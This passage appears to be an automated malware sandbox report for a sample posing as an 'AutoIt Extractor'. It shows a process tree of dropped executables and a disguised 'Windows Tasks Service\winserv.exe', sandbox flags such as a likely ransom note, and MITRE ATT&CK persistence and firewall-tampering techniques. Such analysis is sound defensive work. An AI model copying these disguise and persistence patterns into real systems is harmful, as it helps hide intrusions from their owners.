      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:1
      PID: 5552

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5708 /prefetch:1
      PID: 5476

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5716 /prefetch:1
      PID: 5288

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6660 /prefetch:8
      PID: 4564

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6244 /prefetch:8
      PID: 1844

    C:\Users\Admin\Downloads\AutoIt-Extractor-net40-x64.exe
      Command line: "C:\Users\Admin\Downloads\AutoIt-Extractor-net40-x64.exe"
      - Checks computer location settings
      - Executes dropped EXE
      - Modifies registry class
      - Suspicious use of SetWindowsHookEx
      PID: 3164

        C:\Users\Admin\AppData\Local\Temp\aut62312.exe
          Command line: "C:\Users\Admin\AppData\Local\Temp\aut62312.exe"
          - Executes dropped EXE
          - Suspicious use of SetWindowsHookEx
          PID: 2008

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6816 /prefetch:2
      PID: 5556
C:\Windows\System32\CompPkgSrv.exe
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
  PID: 2592

C:\Windows\System32\CompPkgSrv.exe
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
  PID: 3040

C:\Windows\System32\svchost.exe
  Command line: C:\Windows\System32\svchost.exe -k NetworkService -s TermService
  PID: 5328

C:\Windows\System32\svchost.exe
  Command line: C:\Windows\System32\svchost.exe -k NetworkService -s TermService
  - Loads dropped DLL
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID: 808

C:\ProgramData\Windows Tasks Service\winserv.exe
  Command line: "C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID: 5648

C:\ProgramData\Windows Tasks Service\winserv.exe
  Command line: "C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID: 5540

C:\Windows\System32\rundll32.exe
  Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
  PID: 3552

C:\ProgramData\Windows Tasks Service\winserv.exe
  Command line: "C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID: 4620

C:\Windows\system32\NOTEPAD.EXE
  Command line: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Documents\test.txt
  - Opens file in notepad (likely ransom note)
  PID: 5336

C:\ProgramData\Windows Tasks Service\winserv.exe
  Command line: "C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID: 6136

C:\ProgramData\Windows Tasks Service\winserv.exe
  Command line: "C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID: 5196
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
  - Enumerates system info in registry
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID: 3872

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff81d7c46f8,0x7ff81d7c4708,0x7ff81d7c4718
      PID: 6092

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,4822494727287089511,9643756628446368268,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:2
      PID: 4756

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,4822494727287089511,9643756628446368268,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3
      PID: 1596

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,4822494727287089511,9643756628446368268,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2892 /prefetch:8
      PID: 1260

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4822494727287089511,9643756628446368268,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
      PID: 5216

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4822494727287089511,9643756628446368268,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
      PID: 4984

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4822494727287089511,9643756628446368268,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1
      PID: 4788

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4822494727287089511,9643756628446368268,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4520 /prefetch:1
      PID: 4032

    C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,4822494727287089511,9643756628446368268,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3668 /prefetch:8
      PID: 1824

    C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,4822494727287089511,9643756628446368268,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3668 /prefetch:8
      PID: 2864

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4822494727287089511,9643756628446368268,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:1
      PID: 2224

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4822494727287089511,9643756628446368268,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3860 /prefetch:1
      PID: 1092

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4822494727287089511,9643756628446368268,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5124 /prefetch:1
      PID: 5236

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4822494727287089511,9643756628446368268,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5040 /prefetch:1
      PID: 3688

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4822494727287089511,9643756628446368268,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5024 /prefetch:1
      PID: 2644

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4822494727287089511,9643756628446368268,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:1
      PID: 5140

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2096,4822494727287089511,9643756628446368268,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6004 /prefetch:8
      - Modifies registry class
      - Suspicious use of SetWindowsHookEx
      PID: 752

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4822494727287089511,9643756628446368268,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6028 /prefetch:1
      PID: 5884

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4822494727287089511,9643756628446368268,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:1
      PID: 5864

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4822494727287089511,9643756628446368268,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5972 /prefetch:1
      PID: 3976

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4822494727287089511,9643756628446368268,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5716 /prefetch:1
      PID: 3012

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4822494727287089511,9643756628446368268,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:1
      PID: 2848

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,4822494727287089511,9643756628446368268,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3452 /prefetch:2
      PID: 3808

C:\Windows\System32\CompPkgSrv.exe
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
  PID: 2384

C:\Windows\System32\CompPkgSrv.exe
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
  PID: 2992

C:\ProgramData\Windows Tasks Service\winserv.exe
  Command line: "C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
  - Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:624
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3920
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4144
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5080
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:732
Network
MITRE ATT&CK Enterprise v15
Persistence
- Account Manipulation (1)
- Boot or Logon Autostart Execution (2)
  - Registry Run Keys / Startup Folder (1)
  - Winlogon Helper DLL (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Account Manipulation (1)
- Boot or Logon Autostart Execution (2)
  - Registry Run Keys / Startup Folder (1)
  - Winlogon Helper DLL (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)
Defense Evasion
- Impair Defenses (1)
  - Disable or Modify System Firewall (1)
- Modify Registry (2)
- Virtualization/Sandbox Evasion (1)
Downloads